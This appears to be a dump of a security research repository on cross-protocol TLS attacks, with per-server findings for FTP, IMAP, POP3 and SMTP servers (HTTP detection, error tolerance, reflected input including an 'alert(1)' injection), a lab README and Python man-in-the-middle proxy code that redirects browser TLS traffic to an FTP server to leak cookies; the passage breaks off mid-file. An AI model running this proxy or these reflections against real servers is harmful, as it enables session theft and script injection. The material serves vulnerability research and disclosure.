``` 37 | ftp> mkdir "" 38 | 257 "/home/marcus/foo/" created 39 | ``` 40 | 41 | [1]: https://owasp.org/www-community/xss-filter-evasion-cheatsheet 42 | -------------------------------------------------------------------------------- /exploits/ftp/05-filezilla.md: -------------------------------------------------------------------------------- 1 | ## FileZilla 2 | 3 | Name | Version 4 | :---------|:----------- 5 | FileZilla | 0.9.60 beta 6 | 7 | The homepage of FileZilla is https://filezilla-project.org/. 8 | 9 | ### HTTP Detection 10 | 11 | No detection of POST request. 12 | 13 | ### Error Tolerance 14 | 15 | Yes, at least 100 errors allowed. 16 | 17 | ### Reflection 18 | 19 | Yes, pre-auth. 20 | 21 | ``` 22 | USER 23 | 331 Password required for 24 | ``` 25 | -------------------------------------------------------------------------------- /exploits/ftp/06-serv-u.md: -------------------------------------------------------------------------------- 1 | ## Serv-U 2 | 3 | Name | Version 4 | :---------|:--------------------- 5 | Serv-U | 15.2.1 (14 day trial) 6 | 7 | The homepage of Serv-U FTP Server is https://www.serv-u.com/ftp-server-software. 8 | 9 | ### HTTP Detection 10 | 11 | No detection of POST request. 12 | 13 | ### Error Tolerance 14 | 15 | Yes, at least 100 errors allowed. 16 | 17 | ### Reflection 18 | 19 | Yes, pre-auth. 20 | 21 | ``` 22 | HELP 23 | 501 '': HELP unknown command. 24 | ``` 25 | -------------------------------------------------------------------------------- /exploits/imap/01-dovecot.md: -------------------------------------------------------------------------------- 1 | ## Dovecot IMAP 2 | 3 | Name | Version 4 | :---------------|:-------------- 5 | Dovecot (IMAP) | 2.4.devel 6 | 7 | ### HTTP Detection 8 | 9 | Dovecot IMAP does not detect HTTP requests. 10 | 11 | ``` 12 | S: * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ STARTTLS LOGINDISABLED] Dovecot ready. 13 | C: GET /get HTTP/1.1 14 | S: GET BAD Error in IMAP command received by server. 15 | (...) 16 | ``` 17 | 18 | ### Error Tolerance 19 | 20 | No, Dovecot aborts the connection after three errors. 21 | 22 | ### Reflection 23 | 24 | No reflection found pre-auth. 25 | 26 | Post-auth, a reflection was found in the `SELECT` command (see 27 | below). 28 | 29 | ``` 30 | C: MrogJcxL SELECT {25+} 31 | 32 | MrogJcxL NO Mailbox doesn't exist: (0.001 + 0.000 secs). 33 | S: 34 | ``` 35 | 36 | ### Additional Notes 37 | 38 | In addition to the post-auth reflection in `SELECT`, some more 39 | commands reflect a limited range of characters post-auth. 40 | 41 | ``` 42 | # 1 43 | C: 5tC2DHro APPEND F1SbF2mm (by52U6Nv) {4} 44 | S: 5tC2DHro NO [TRYCREATE] Mailbox doesn't exist: F1SbF2mm (0.001 + 0.000 secs). 45 | * BAD Error in IMAP command : Unknown command (0.001 + 0.000 secs). 46 | # 3 47 | C: oLwzmRAU DELETE lLD1OZ5m 48 | S: oLwzmRAU NO [NONEXISTENT] Mailbox doesn't exist: lLD1OZ5m (0.010 + 0.000 + 0.009 secs). 49 | # 4 50 | C: iTnRlIKC EXAMINE As7bHlRP 51 | S: iTnRlIKC NO Mailbox doesn't exist: As7bHlRP (0.001 + 0.000 secs). 52 | # 7 53 | C: cEAgkcG5 RENAME 96zafyjR uYLSxc0t 54 | S: cEAgkcG5 NO [NONEXISTENT] Mailbox doesn't exist: 96zafyjR (0.008 + 0.000 + 0.007 secs). 55 | # 8 56 | C: RVf9dGgb SELECT 4DblObyT 57 | S: RVf9dGgb NO Mailbox doesn't exist: 4DblObyT (0.001 + 0.000 secs). 58 | # 9 59 | C: Ssoh6gb8 STATUS CHDkHjkQ (UIDVALIDITY) 60 | S: Ssoh6gb8 NO Mailbox doesn't exist: CHDkHjkQ (0.001 + 0.000 secs). 61 | # 10 62 | C: vELO4cIk SUBSCRIBE Drxr2cdj 63 | S: vELO4cIk NO Mailbox doesn't exist: Drxr2cdj (0.001 + 0.000 secs). 64 | ``` 65 | -------------------------------------------------------------------------------- /exploits/imap/02-courier.md: -------------------------------------------------------------------------------- 1 | ## Courier IMAP 2 | 3 | Name | Version 4 | :---------------|:-------------- 5 | Courier (IMAP) | 5.0.6+1.0.6-1 6 | 7 | ### HTTP Detection 8 | 9 | No detection of HTTP requests. 10 | 11 | ``` 12 | S: * OK [CAPABILITY IMAP4rev1] Courier-IMAP ready. Copyright 1998-2016 Double Precision, Inc. See COPYING for distribution information. 13 | C: GET /get HTTP/1.1 14 | S: GET NO Error in IMAP command received by server. 15 | (...) 16 | ``` 17 | 18 | ### Error Tolerance 19 | 20 | No, Courier aborts the connection after ten errors. However, the 21 | counter is reset on each valid command, so a bypass may be possible if 22 | the browser provides enough flexibility in setting custom HTTP 23 | headers. 24 | 25 | ### Reflection 26 | 27 | Yes, pre-auth reflection is possible using the tag. 28 | 29 | ``` 30 | * OK [CAPABILITY IMAP4rev1] Courier-IMAP ready. Copyright 1998-2016 Double Precision, Inc. See COPYING for distribution information. 31 | xxx 32 | NO Error in IMAP command received by server. 33 | ``` 34 | 35 | -------------------------------------------------------------------------------- /exploits/imap/03-exchange.md: -------------------------------------------------------------------------------- 1 | ## Exchange IMAP 2 | 3 | Name | Version 4 | :---------------|:-------------- 5 | Exchange (IMAP) | 15.20 6 | 7 | ### HTTP Detection 8 | 9 | No detection of HTTP requests. 10 | 11 | ``` 12 | * OK The Microsoft Exchange IMAP4 service is ready. [(...)] 13 | GET /get HTTP/1.1 14 | GET BAD Command Error. 12 15 | (...) 16 | ``` 17 | 18 | ### Error Tolerance 19 | 20 | No, Exchange aborts the connection after three errors. 21 | 22 | ### Reflection 23 | 24 | Yes, pre-auth reflection is possible using the tag. 25 | 26 | ``` 27 | * OK The Microsoft Exchange IMAP4 service is ready. 28 | noop 29 | OK NOOP completed. 30 | a"'<>/\{}[]() noop 31 | a"'<>/\{}[]() OK NOOP completed. 32 | ``` 33 | -------------------------------------------------------------------------------- /exploits/imap/04-cyrus.md: -------------------------------------------------------------------------------- 1 | ## Cyrus IMAP 2 | 3 | Name | Version 4 | :---------------|:-------------- 5 | Cyrus (IMAP) | 3.2.4 6 | 7 | ### HTTP Detection 8 | 9 | No detection of HTTP requests. 10 | 11 | ``` 12 | S: * OK [CAPABILITY IMAP4rev1 LITERAL+ ID ENABLE STARTTLS AUTH=PLAIN SASL-IR] test Cyrus IMAP 3.2.4-Debian-3.2.4-3 server ready 13 | C: GET /get HTTP/1.1 14 | S: GET BAD Please login first 15 | (...) 16 | ``` 17 | 18 | ### Error Tolerance 19 | 20 | Yes, at least 100 errors allowed. 21 | 22 | ### Reflection 23 | 24 | Yes, pre-auth reflection is possible using the tag. 25 | 26 | ``` 27 | * OK [CAPABILITY IMAP4rev1 LITERAL+ ID ENABLE STARTTLS AUTH=PLAIN SASL-IR] test Cyrus IMAP 3.2.4-Debian-3.2.4-3 server ready 28 | noop 29 | OK Completed 30 | ``` 31 | -------------------------------------------------------------------------------- /exploits/imap/05-kerio-connect.md: -------------------------------------------------------------------------------- 1 | ## Kerio Connect IMAP 2 | 3 | Name | Version 4 | :--------------------|:-------------- 5 | Kerio Connect (IMAP) | 9.3.0 6 | 7 | ### HTTP Detection 8 | 9 | No detection of HTTP requests. 10 | 11 | ``` 12 | S: * OK Kerio Connect 9.3.0 IMAP4rev1 server ready 13 | C: GET /get HTTP/1.1 14 | S: GET BAD Unknown command '/get' 15 | (...) 16 | ``` 17 | 18 | ### Error Tolerance 19 | 20 | Yes, at least 100 errors allowed. 21 | 22 | ### Reflection 23 | 24 | Yes, pre-auth reflection is possible using invalid commands. 25 | 26 | ``` 27 | x 28 | x BAD Unknown command '' 29 | ``` 30 | -------------------------------------------------------------------------------- /exploits/imap/06-zimbra.md: -------------------------------------------------------------------------------- 1 | ## Zimbra IMAP 2 | 3 | Name | Version 4 | :-------------|:-------------- 5 | Zimbra (IMAP) | 8.8.15 6 | 7 | ### HTTP Detection 8 | 9 | No detection of HTTP requests. 10 | 11 | ``` 12 | S: * OK IMAP4rev1 proxy server ready 13 | C: GET /get HTTP/1.1 14 | S: GET BAD invalid command 15 | (...) 16 | ``` 17 | 18 | ### Error Tolerance 19 | 20 | Yes, at least 100 errors allowed. 21 | 22 | ### Reflection 23 | 24 | Yes, pre-auth reflection is possible using the search charset command. 25 | 26 | ``` 27 | C: X-Ignore: search charset {35+} 28 | C: ignore: 29 | S: X-Ignore: NO [BADCHARSET] parse error: unknown charset: ignore: 30 | ``` 31 | -------------------------------------------------------------------------------- /exploits/pop3/01-dovecot.md: -------------------------------------------------------------------------------- 1 | ## Dovecot POP3 2 | 3 | Name | Version 4 | :---------------|:-------------- 5 | Dovecot (POP3) | 2.4.devel 6 | 7 | ### HTTP Detection 8 | 9 | Dovecot POP3 does not detect HTTP requests. 10 | 11 | ``` 12 | S: +OK Dovecot ready. 13 | C: GET /get HTTP/1.1 14 | S: -ERR Unknown command. 15 | (...) 16 | ``` 17 | 18 | ### Error Tolerance 19 | 20 | No, Dovecot aborts the connection after three errors. The counter is 21 | reset after a valid command. 22 | 23 | ### Reflection 24 | 25 | No reflection found pre-auth. 26 | 27 | Post-auth, a reflection was found with invalid command. 28 | 29 | ``` 30 | -- Post Auth -- 31 | 32 | -ERR Unknown command: 33 | ``` 34 | -------------------------------------------------------------------------------- /exploits/pop3/02-courier.md: -------------------------------------------------------------------------------- 1 | ## Courier POP3 2 | 3 | Name | Version 4 | :---------------|:-------------- 5 | Courier (POP3) | 5.0.6+1.0.6-1 6 | 7 | ### HTTP Detection 8 | 9 | No detection of HTTP requests. 10 | 11 | ``` 12 | S: +OK Hello there. 13 | C: GET /get HTTP/1.1 14 | S: -ERR Invalid command. 15 | (...) 16 | ``` 17 | 18 | ### Error Tolerance 19 | 20 | Yes, at least 100 errors allowed. 21 | 22 | ### Reflection 23 | 24 | No reflection was found. 25 | 26 | 27 | -------------------------------------------------------------------------------- /exploits/pop3/03-exchange.md: -------------------------------------------------------------------------------- 1 | ## Exchange POP3 2 | 3 | Name | Version 4 | :---------------|:-------------- 5 | Exchange (POP3) | 15.20 6 | 7 | ### HTTP Detection 8 | 9 | No detection of HTTP requests. 10 | 11 | ``` 12 | S: +OK The Microsoft Exchange POP3 service is ready. [...] 13 | C: GET /get HTTP/1.1 14 | S: -ERR Protocol error. 19 15 | (...) 16 | ``` 17 | 18 | ### Error Tolerance 19 | 20 | No, Exchange aborts the connection after three errors. 21 | 22 | ### Reflection 23 | 24 | No reflection was found. 25 | -------------------------------------------------------------------------------- /exploits/pop3/04-cyrus.md: -------------------------------------------------------------------------------- 1 | ## Cyrus POP3 2 | 3 | Name | Version 4 | :---------------|:-------------- 5 | Cyrus (POP3) | 3.0.8 6 | 7 | ### HTTP Detection 8 | 9 | No detection of HTTP requests. 10 | 11 | ``` 12 | S: +OK test Cyrus POP3 3.2.4-Debian-3.2.4-3 server ready <7544288959592343525.1602504874@test> 13 | C: GET /get HTTP/1.1 14 | S: -ERR Unrecognized command 15 | (...) 16 | ``` 17 | 18 | ### Error Tolerance 19 | 20 | Yes, at least 100 errors allowed. 21 | 22 | ### Reflection 23 | 24 | No reflection was found. 25 | -------------------------------------------------------------------------------- /exploits/pop3/05-kerio-connect.md: -------------------------------------------------------------------------------- 1 | ## Kerio Connect POP3 2 | 3 | Name | Version 4 | :--------------------|:-------------- 5 | Kerio Connect (POP3) | 9.3.0 6 | 7 | ### HTTP Detection 8 | 9 | No detection of HTTP requests. 10 | 11 | ``` 12 | S: +OK Kerio Connect 9.3.0 POP3 server ready <...> 13 | C: GET /get HTTP/1.1 14 | S: -ERR Invalid command; valid commands: USER PASS AUTH APOP STLS CAPA QUIT 15 | (...) 16 | ``` 17 | 18 | ### Error Tolerance 19 | 20 | Yes, at least 100 errors allowed. 21 | 22 | ### Reflection 23 | 24 | No reflection was found. 25 | -------------------------------------------------------------------------------- /exploits/pop3/06-zimbra.md: -------------------------------------------------------------------------------- 1 | ## Zimbra IMAP 2 | 3 | Name | Version 4 | :-------------|:-------------- 5 | Zimbra (IMAP) | 8.8.15 6 | 7 | ### HTTP Detection 8 | 9 | No detection of HTTP requests. 10 | 11 | ``` 12 | S: +OK POP3 ready 13 | C: GET /get HTTP/1.1 14 | S: -ERR invalid command 15 | (...) 16 | ``` 17 | 18 | ### Error Tolerance 19 | 20 | Yes, at least 100 errors allowed. 21 | 22 | ### Reflection 23 | 24 | No reflection was found. 25 | -------------------------------------------------------------------------------- /exploits/smtp/01-postfix.md: -------------------------------------------------------------------------------- 1 | ## Postfix 2 | 3 | Name | Version 4 | :---------|:-------------- 5 | Postfix | 3.5.9 6 | 7 | The homepage of Postfix is http://www.postfix.org/. 8 | 9 | We used a [Docker image][1] by the GitHub user `bokysan`. 10 | 11 | [1]: https://github.com/bokysan/docker-postfix 12 | 13 | ``` 14 | $ docker run --rm --name postfix -e "ALLOWED_SENDER_DOMAINS=example.com" -p 1587:587 boky/postfix 15 | ``` 16 | 17 | ### HTTP Detection 18 | 19 | Postfix detects and blocks HTTP POST requests. 20 | 21 | ``` 22 | 220 1237cfa6400d ESMTP Postfix 23 | POST / HTTP/1.1 24 | 221 2.7.0 Error: I can break rules, too. Goodbye. 25 | Connection closed by foreign host. 26 | ``` 27 | 28 | ``` 29 | 220 1237cfa6400d ESMTP Postfix 30 | Header: Field 31 | 221 2.7.0 Error: I can break rules, too. Goodbye. 32 | Connection closed by foreign host. 33 | ``` 34 | 35 | ### Error Tolerance 36 | 37 | Yes. Postfix terminates the connection after 20 errors, which is 38 | sufficient in all tested browsers. The following listing only shows 39 | the server responses to an infinite stream of error commands. 40 | 41 | ``` 42 | 502 5.5.2 Error: command not recognized 43 | 502 5.5.2 Error: command not recognized 44 | 502 5.5.2 Error: command not recognized 45 | 502 5.5.2 Error: command not recognized 46 | 502 5.5.2 Error: command not recognized 47 | 502 5.5.2 Error: command not recognized 48 | 502 5.5.2 Error: command not recognized 49 | 502 5.5.2 Error: command not recognized 50 | 502 5.5.2 Error: command not recognized 51 | 502 5.5.2 Error: command not recognized 52 | 502 5.5.2 Error: command not recognized 53 | 502 5.5.2 Error: command not recognized 54 | 502 5.5.2 Error: command not recognized 55 | 502 5.5.2 Error: command not recognized 56 | 502 5.5.2 Error: command not recognized 57 | 502 5.5.2 Error: command not recognized 58 | 502 5.5.2 Error: command not recognized 59 | 502 5.5.2 Error: command not recognized 60 | 502 5.5.2 Error: command not recognized 61 | 502 5.5.2 Error: command not recognized 62 | 421 4.7.0 1237cfa6400d Error: too many errors 63 | Connection closed by foreign host. 64 | ``` 65 | ### Reflection 66 | 67 | Yes, pre-auth. 68 | 69 | ``` 70 | 220 1237cfa6400d ESMTP Postfix 71 | HELO example.com 72 | 250 1237cfa6400d 73 | MAIL FROM: example 74 | 555 5.5.4 Unsupported option: 75 | ``` 76 | -------------------------------------------------------------------------------- /exploits/smtp/02-exim.md: -------------------------------------------------------------------------------- 1 | ## Exim 2 | 3 | Name | Version 4 | :---------|:-------------- 5 | Exim | 4.93 6 | 7 | The homepage of Exim is https://www.exim.org/. 8 | 9 | We used a [Docker image][1] by the GitHub user `bokysan`. 10 | 11 | [1]: https://github.com/bokysan/docker-postfix 12 | 13 | ``` 14 | $ docker run --rm --name exim -p 2525:25 angelnu/exim 15 | ``` 16 | 17 | ### HTTP Detection 18 | 19 | Exim does not detect HTTP POST requests. 20 | 21 | ``` 22 | 220 d5d6ea0535e1 ESMTP Exim 4.93 Ubuntu Wed, 17 Feb 2021 19:06:27 +0000 23 | POST / HTTP/1.1 24 | 500 unrecognized command 25 | Header: Field 26 | 500 unrecognized command 27 | ``` 28 | 29 | ### Error Tolerance 30 | 31 | No. Exim only allows up to three errors before terminating the connection. 32 | 33 | ``` 34 | 220 d5d6ea0535e1 ESMTP Exim 4.93 Ubuntu Wed, 17 Feb 2021 19:09:03 +0000 35 | error 36 | 500 unrecognized command 37 | error 38 | 500 unrecognized command 39 | error 40 | 500 unrecognized command 41 | error 42 | 500 Too many unrecognized commands 43 | Connection closed by foreign host. 44 | ``` 45 | 46 | ### Reflection 47 | 48 | Yes, pre-auth. 49 | 50 | ``` 51 | MAIL FROM: 52 | 501 : malformed address: alert(1); may not follow 72 | 500 5.5.1 Command unrecognized: "" 73 | ``` 74 | -------------------------------------------------------------------------------- /exploits/smtp/04-mailenable.md: -------------------------------------------------------------------------------- 1 | ## MailEnable 2 | 3 | Name | Version 4 | :---------|:-------------- 5 | MailEnable| 10.32 (Free) 6 | 7 | The homepage of MailEnable is https://www.mailenable.com/. 8 | 9 | ### HTTP Detection 10 | 11 | MailEnable does not detect HTTP POST requests. 12 | 13 | ``` 14 | 229 DESKTOP-UPDDRIK.example.com ESMTP MailEnable Service, Version: 10.32-- ready at 02/17/21 22:57:03 15 | POST / HTTP/11 16 | 503 Bad sequence of commands 17 | ``` 18 | 19 | ### Error Tolerance 20 | 21 | Yes, with bypass. MailEnable accepts only 15 errors before terminating 22 | the connection, but it will process all pending commands in the input 23 | buffer before terminating. 24 | 25 | ### Reflection 26 | 27 | We could not find any reflections in MailEnable. 28 | -------------------------------------------------------------------------------- /exploits/smtp/05-mdaemon.md: -------------------------------------------------------------------------------- 1 | ## MDaemon 2 | 3 | Name | Version 4 | :---------|:-------------- 5 | MDaemon | 21.0.0 6 | 7 | The homepage of MDaemon is https://www.altn.com/. 8 | 9 | ### HTTP Detection 10 | 11 | MDaemon does not recognize or block POST requests. 12 | 13 | ``` 14 | 220 example.com ESMTP Thu, 18 Feb 2021 00:41:24 +0100 15 | POST / HTTP/1.1 16 | 500 5.0.0 Unrecognized command 17 | ``` 18 | 19 | ### Error Tolerance 20 | 21 | No. MDaemon only allows up to three errors before terminating the connection. 22 | 23 | ### Reflection 24 | 25 | Yes, pre-auth. 26 | 27 | ``` 28 | HELO 29 | 250 example.com Hello [::1], pleased to meet you 30 | ``` 31 | -------------------------------------------------------------------------------- /exploits/smtp/06-opensmtpd.md: -------------------------------------------------------------------------------- 1 | ## OpenSMTPD 2 | 3 | Name | Version 4 | :---------|:-------------- 5 | OpenSMTPD | 6.7.1p1 6 | 7 | The homepage of OpenSMTPD is https://www.opensmtpd.org/. 8 | 9 | ### HTTP Detection 10 | 11 | OpenSMTPD does not recognize or block POST requests. 12 | 13 | ``` 14 | 220 church ESMTP OpenSMTPD 15 | POST / HTTP/1.1 16 | 500 5.5.1 Invalid command: Command unrecognized 17 | Header: Field 18 | 500 5.5.1 Invalid command: Command unrecognized 19 | ``` 20 | 21 | ### Error Tolerance 22 | 23 | Yes, at least 100 errors allowed. 24 | 25 | ### Reflection 26 | 27 | Yes, pre-auth. 28 | 29 | ``` 30 | EHLO example.com 31 | 250-church Hello example.com [127.0.0.1], pleased to meet you 32 | 250-8BITMIME 33 | 250-ENHANCEDSTATUSCODES 34 | 250-SIZE 36700160 35 | 250-DSN 36 | 250 HELP 37 | MAIL FROM: 38 | 503 5.5.4 Invalid command arguments: Unsupported option 39 | ``` 40 | 41 | ### Additional Notes 42 | 43 | OpenSMTPD is not exploitable, because it does not support command 44 | pipelining. As the browser sends multiple lines at once, the 45 | connection will be terminated early. 46 | 47 | -------------------------------------------------------------------------------- /testlab/.gitignore: -------------------------------------------------------------------------------- 1 | pki 2 | servers/files/cert 3 | *.pyc -------------------------------------------------------------------------------- /testlab/README.md: -------------------------------------------------------------------------------- 1 | # Cross-Protocol Testlab 2 | 3 | Currenty only the attacks on vsftp works in the lab as the provided email servers in the docker images are the latest version and alpaca is already fixed there. 4 | We are currently working on adding the old server versions to the repository. 5 | 6 | All code provided is experimental and may harm your system. Please use a fresh ubuntu maschine. 7 | 8 | ## Setup 9 | 10 | **1. PLEASE USE A FRESH UBUNTU!** 11 | 12 | **2. Become root on the Maschine** 13 | ``` 14 | sudo -i 15 | ``` 16 | 17 | **3. Install docker as described on https://docs.docker.com/engine/install/ubuntu/** 18 | 19 | **4. Install python3 and docker-compose** 20 | ``` 21 | apt-get install python3 python3-pip 22 | pip3 install docker-compose 23 | ``` 24 | 25 | **5. Run ```./setup.sh```** 26 | ``` 27 | chmod +x setup.sh 28 | ./setup.sh 29 | ``` 30 | 31 | **6. Add ./pki/ca.crt to your Firefox trusted CAs** 32 | You have to copy the file to your user directory and add permissions for your user if firefox does not run as root 33 | ``` 34 | cp ./pki/ca.crt /home// 35 | chmod 775 /home//ca.crt 36 | ``` 37 | The setup is now completed and can be used. 38 | 39 | Important: If you reboot after the setup, you have to manually add a second IP to loopback: 40 | ``` 41 | ip addr add 127.0.0.2/8 dev lo 42 | ``` 43 | ## FTPS 44 | 45 | Make sure, that: 46 | 1. you have installed the CA-Certificate as described above into your firefox! 47 | 48 | 2. your loopback interface has a second IP-Address (127.0.0.2/8)! 49 | 50 | 51 | Start the docker services 52 | ``` 53 | docker-compose -f servers/docker-compose.yml up -d nginx-target nginx-attacker vsftp 54 | ``` 55 | Run the MitM-Proxy 56 | ``` 57 | cd mitmproxy 58 | python3 main.py --proto FTP --attacker_ip 127.0.0.2 127.0.0.1 21 59 | ``` 60 | 61 | The Proxy is now running in unarmed mode. You can open Firefox and visit https://target.com. 62 | The server on target.com will set a cookie with the displayed session ID. 63 | 64 | After that, switch the proxy to armed mode by pressing any key in the console window. 65 | 66 | Open a second console window and execute ```scripts/show_vsftp_log.sh``` to display the ftp log. 67 | 68 | Navigate in Firefox to https://attacker.com. 69 | Here you can choose between two attacks (Upload und Download) 70 | 71 | 1. Download 72 | 73 | If you click on download, you will see a white page for aprox. 5 seconds, then the browser redirects to target.com and show an alert box. 74 | 75 | 2. Upload 76 | 77 | If you click on Upload, the browser will navigate to the attack page and than, after 5 seconds redirect to target.com. 78 | In the second console windows with the logs you can now also see the uploaded GET request of the browser including the cookie. 79 | 80 | -------------------------------------------------------------------------------- /testlab/mitmproxy/main.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import argparse 3 | 4 | from proxy.socket.mitmsocket import MITMSocketProxy 5 | from utils.logging import init_logging, _info 6 | 7 | parser = argparse.ArgumentParser(prog='MITMProxy') 8 | parser.add_argument('target_ip', help='Target IP') 9 | parser.add_argument('target_port', type=int, help='Target PORT') 10 | parser.add_argument('--attacker_ip', help='Attacker IP', required=False) 11 | parser.add_argument('--attacker_port', type=int, help='Attacker Port', required=False) 12 | parser.add_argument('--log_level', choices=['DEBUG', 'INFO'], help='Log Level', required=False) 13 | parser.add_argument('--protocol', choices=['FTP', 'POP3', 'POP3S', 'IMAP', 'IMAPS', 'SMTP'], help='Protocol', required=False) 14 | 15 | parser.set_defaults(attacker_ip="127.0.0.2", attacker_port=443, log_level='INFO', protocol='FTP') 16 | args = parser.parse_args() 17 | init_logging(args.log_level) 18 | 19 | _info("main", 20 | f"Starting socket proxy redirecting from {args.attacker_ip}:{args.attacker_port} to {args.target_ip}:{args.target_port} for protocol {args.protocol}") 21 | 22 | proxy = MITMSocketProxy(args.attacker_ip, args.attacker_port, args.target_ip, args.target_port, args.protocol) 23 | proxy.run() 24 | -------------------------------------------------------------------------------- /testlab/mitmproxy/proxy/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RUB-NDS/alpaca-code/6b939f3592505b5c446be97fcf99005008986d05/testlab/mitmproxy/proxy/__init__.py -------------------------------------------------------------------------------- /testlab/mitmproxy/proxy/socket/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RUB-NDS/alpaca-code/6b939f3592505b5c446be97fcf99005008986d05/testlab/mitmproxy/proxy/socket/__init__.py -------------------------------------------------------------------------------- /testlab/mitmproxy/proxy/socket/mitmsocket.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import socket 3 | 4 | from _thread import * 5 | 6 | from proxy.socket.protocols.ftp import FTPHandler 7 | from proxy.socket.protocols.imap import IMAPHandler 8 | from proxy.socket.protocols.imaps import IMAPSHandler 9 | from proxy.socket.protocols.pop3 import POP3Handler 10 | from proxy.socket.protocols.pop3s import POP3SHandler 11 | from proxy.socket.protocols.smtp import SMTPHandler 12 | from utils.common import AddressInfo 13 | from utils.logging import _info 14 | 15 | protocol_handler = {'FTP': FTPHandler, 'POP3': POP3Handler, 'POP3S': POP3SHandler, 'IMAP':IMAPHandler,'IMAPS':IMAPSHandler, 'SMTP': SMTPHandler} 16 | 17 | 18 | class MITMSocketProxy: 19 | def __init__(self, attacker_ip, attacker_port, target_ip, target_port, protocol): 20 | self.target_ip = target_ip 21 | self.target_port = target_port 22 | self.attacker_ip = attacker_ip 23 | self.attacker_port = attacker_port 24 | self.unarmed_target_ip = target_ip 25 | self.unarmed_target_port = 443 26 | self.connections = [] 27 | self.handler = protocol_handler[protocol](self.target_ip, self.target_port, self.unarmed_target_ip, self.unarmed_target_port) 28 | self.armed = False 29 | 30 | def run(self): 31 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 32 | s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 33 | 34 | start_new_thread(self.arm, ()) 35 | try: 36 | s.bind((self.attacker_ip, self.attacker_port)) 37 | s.listen(5) 38 | while True: 39 | client, address = s.accept() 40 | self.connections.append((client)) 41 | addr = AddressInfo(ip=address[0], port=address[1]) 42 | _info("mitmproxy.main", f"[{addr.ip}] Connection from {addr.ip}:{addr.port}") 43 | start_new_thread(self.handler.handle_connection, (addr, client, self.armed)) 44 | 45 | finally: 46 | s.close() 47 | 48 | def arm(self): 49 | while True: 50 | x = input("Press key to toggle armed state") 51 | self.armed = not self.armed 52 | for x in self.connections: 53 | x.close() 54 | _info("mitmproxy ", f"ARMED STATE: {self.armed}") 55 | 56 | -------------------------------------------------------------------------------- /testlab/mitmproxy/proxy/socket/protocols/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RUB-NDS/alpaca-code/6b939f3592505b5c446be97fcf99005008986d05/testlab/mitmproxy/proxy/socket/protocols/__init__.py -------------------------------------------------------------------------------- /testlab/mitmproxy/proxy/socket/protocols/ftp.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import time 3 | from collections import defaultdict 4 | 5 | from utils.logging import _info, _error 6 | from utils.tls import forward_tls_handshake_and_data 7 | 8 | from utils.tls import read_tls_packet 9 | 10 | FIRST_CONNECT = 0 11 | ATTACK_PREPARATION_STARTED = 1 12 | ATTACK_PREPARED = 2 13 | ATTACK_FINISHED = 3 14 | 15 | 16 | class FTPHandler: 17 | def __init__(self, target_ip, target_port, unarmed_target_ip, unarmed_target_port): 18 | self.status = defaultdict(int) 19 | self.target_ip = target_ip 20 | self.target_port = target_port 21 | self.unarmed_target_ip = unarmed_target_ip 22 | self.unarmed_target_port = unarmed_target_port 23 | 24 | def handle_connection(self, addr, client_socket, armed): 25 | if not armed: 26 | self._forward_http_traffic(addr, client_socket) 27 | else: 28 | if self.status[addr.ip] == FIRST_CONNECT: 29 | self._prepare_attack(addr, client_socket) 30 | elif self.status[addr.ip] == ATTACK_FINISHED: 31 | return 32 | else: 33 | self._leak_data(addr, client_socket) 34 | 35 | def _forward_http_traffic(self, addr, client_socket): 36 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] FORWARD HTTP TRAFFIC") 37 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] CONNECT TO {self.unarmed_target_ip}{self.unarmed_target_port}") 38 | target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 39 | target_socket.connect((self.unarmed_target_ip, self.unarmed_target_port)) 40 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] CONNECTED TO {self.unarmed_target_ip}{self.unarmed_target_port}") 41 | forward_tls_handshake_and_data(addr, client_socket, target_socket) 42 | 43 | def _prepare_attack(self, addr, client_socket): 44 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] Attack Preparation") 45 | self.status[addr.ip] = ATTACK_PREPARATION_STARTED 46 | target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 47 | target_socket.connect((self.target_ip, self.target_port)) 48 | target_socket.recv(4096) 49 | target_socket.sendall(b"AUTH SSL\n") 50 | target_socket.recv(4096) 51 | 52 | forward_tls_handshake_and_data(addr, client_socket, target_socket) 53 | 54 | self.status[addr.ip] = ATTACK_PREPARED 55 | _info("mitmproxy.atck", f"[{addr.ip}] [FIN] Attack Preparation") 56 | 57 | def _leak_data(self, addr, client_socket): 58 | _info("mitmproxy.leak", f"[{addr.ip}] [RUN] Data Leakage") 59 | while self.status[addr.ip] is not ATTACK_PREPARED: 60 | time.sleep(1) 61 | 62 | client_hello = read_tls_packet(client_socket) 63 | 64 | for pasv_port in range(10090, 10101): 65 | try: 66 | _info("mitmproxy.leak", f"[{addr.ip}] Try to port {self.target_ip}:{pasv_port}") 67 | target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 68 | target_socket.connect((self.target_ip, pasv_port)) 69 | 70 | target_socket.sendall(client_hello) 71 | 72 | try: 73 | server_hello = read_tls_packet(target_socket) 74 | except: 75 | raise ConnectionRefusedError 76 | 77 | client_socket.sendall(server_hello) 78 | forward_tls_handshake_and_data(addr, client_socket, target_socket) 79 | 80 | client_socket.close() 81 | target_socket.close() 82 | self.status[addr.ip] = ATTACK_FINISHED 83 | _info("mitmproxy.leak", f"[{addr.ip}] [FIN] Data Leakage") 84 | return 85 | except ConnectionRefusedError: 86 | _info("mitmproxy.leak", f"[{addr.ip}] ConnectionRefusedError") 87 | _error("mitmproxy.leak", "Cound not find open passive port") -------------------------------------------------------------------------------- /testlab/mitmproxy/proxy/socket/protocols/imap.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import time 3 | from collections import defaultdict 4 | 5 | from utils.logging import _info, _error 6 | from utils.tls import forward_tls_handshake_and_data 7 | 8 | from utils.tls import read_tls_packet 9 | 10 | FIRST_CONNECT = 0 11 | ATTACK_PREPARATION_STARTED = 1 12 | ATTACK_PREPARED = 2 13 | 